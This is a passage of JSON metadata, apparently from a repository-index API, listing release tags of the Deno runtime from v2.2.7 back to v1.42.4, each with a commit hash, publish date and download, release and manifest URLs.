ithub.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"pur